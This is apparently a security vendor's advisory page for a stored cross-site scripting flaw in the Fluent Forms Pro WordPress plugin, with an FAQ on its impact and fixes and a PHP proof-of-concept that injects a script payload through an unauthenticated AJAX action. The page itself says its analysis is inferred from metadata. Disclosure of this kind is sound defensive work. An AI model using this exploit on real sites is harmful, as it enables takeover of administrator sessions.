Atomic Edge analysis of CVE-2026-2365 (metadata-based):
The vulnerability exists in the Fluent Forms Pro WordPress plugin. The root cause is an unauthenticated AJAX endpoint with insufficient input sanitization and output escaping. The `fluentform_step_form_save_data` AJAX action is publicly accessible without authentication or nonce verification. This allows unauthenticated attackers to submit draft form data containing malicious scripts. The plugin stores this data without proper sanitization. The stored scripts execute when an administrator views the partial form entry in the WordPress dashboard. The CVSS vector indicates network attack vector, low attack complexity, no privileges required, no user interaction, and scope change with low confidentiality and integrity impact. The fix likely requires adding authentication or capability checks to the AJAX handler, implementing nonce verification, and applying proper sanitization (e.g., `sanitize_text_field`) and output escaping (e.g., `esc_html` or `wp_kses`). The impact includes session hijacking, administrative account compromise, and site defacement via stored XSS payloads. These conclusions about the endpoint and missing security controls are inferred from the CWE and description, not confirmed via code review.
CVE-2026-2365: Fluent Forms Pro <= 6.1.17 – Unauthenticated Stored Cross-Site Scripting via Draft Form Submission (fluentformpro)
CVE-2026-2365
fluentformpro
6.1.17
—
Analysis Overview
Differential between vulnerable and patched code
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2365 - Fluent Forms Pro <= 6.1.17 - Unauthenticated Stored Cross-Site Scripting via Draft Form Submission
<?php
$target_url = 'https://example.com';
// WordPress AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Payload to inject JavaScript that triggers on admin page view
$payload = '<script>alert(document.domain)</script>';
// Construct POST data for the vulnerable AJAX action
$post_data = [
'action' => 'fluentform_step_form_save_data',
'form_id' => '1', // Assumes at least one form exists
'step_data' => json_encode([
'fields' => [
'input_field' => $payload
]
])
];
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Output results
if ($http_code === 200 && strpos($response, 'success') !== false) {
echo "Payload injected successfully.n";
echo "The script will execute when an administrator views the draft submission.n";
} else {
echo "Injection failed. HTTP Code: $http_coden";
echo "Response: $responsen";
}
?>Frequently Asked Questions
What is CVE-2026-2365?
Understanding the vulnerabilityCVE-2026-2365 is a high-severity vulnerability in the Fluent Forms Pro plugin for WordPress that allows unauthenticated stored cross-site scripting via draft form submissions. The flaw arises from an AJAX endpoint that is publicly accessible without proper authentication or input sanitization.
How does this vulnerability work?
Mechanism of exploitationThe vulnerability allows attackers to submit malicious scripts through the `fluentform_step_form_save_data` AJAX action. These scripts are stored by the plugin and can execute when an administrator views the form entry, potentially compromising the site.
Who is affected by this vulnerability?
Identifying vulnerable usersAny WordPress site using Fluent Forms Pro version 6.1.17 or earlier is affected. Site administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps to verify vulnerabilityTo check if your site is vulnerable, verify the version of the Fluent Forms Pro plugin installed. If it is version 6.1.17 or earlier, your site is at risk and should be updated immediately.
What is the recommended fix for this vulnerability?
Mitigation stepsThe recommended fix is to update the Fluent Forms Pro plugin to the latest version where the vulnerability has been addressed. Additionally, implementing proper input sanitization and authentication checks in the AJAX handler is crucial.
What does a CVSS score of 7.2 indicate?
Understanding risk levelsA CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk, allowing attackers to exploit it with minimal effort and without needing authentication.
How does the proof of concept demonstrate the vulnerability?
Explaining the demonstration codeThe proof of concept provided shows how an attacker can use cURL to send a crafted request to the vulnerable AJAX endpoint, injecting a script that executes when an administrator views the form data. This highlights the ease of exploitation due to the lack of security controls.
What are the potential impacts of this vulnerability?
Consequences of exploitationIf exploited, this vulnerability can lead to session hijacking, administrative account compromise, and site defacement. Attackers can execute arbitrary scripts in the context of the administrator’s session.
What additional security measures should I consider?
Enhancing overall securityIn addition to updating the plugin, consider implementing web application firewalls, regular security audits, and user role management to limit access to sensitive areas of your WordPress site.
Is there a way to test for this vulnerability?
Testing for exposureSecurity professionals can test for this vulnerability by attempting to submit a draft form with a malicious payload through the AJAX endpoint. However, this should only be done in a controlled environment and with permission.
How can I stay informed about vulnerabilities like this?
Keeping updated on securityTo stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database for updates on vulnerabilities affecting WordPress plugins.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
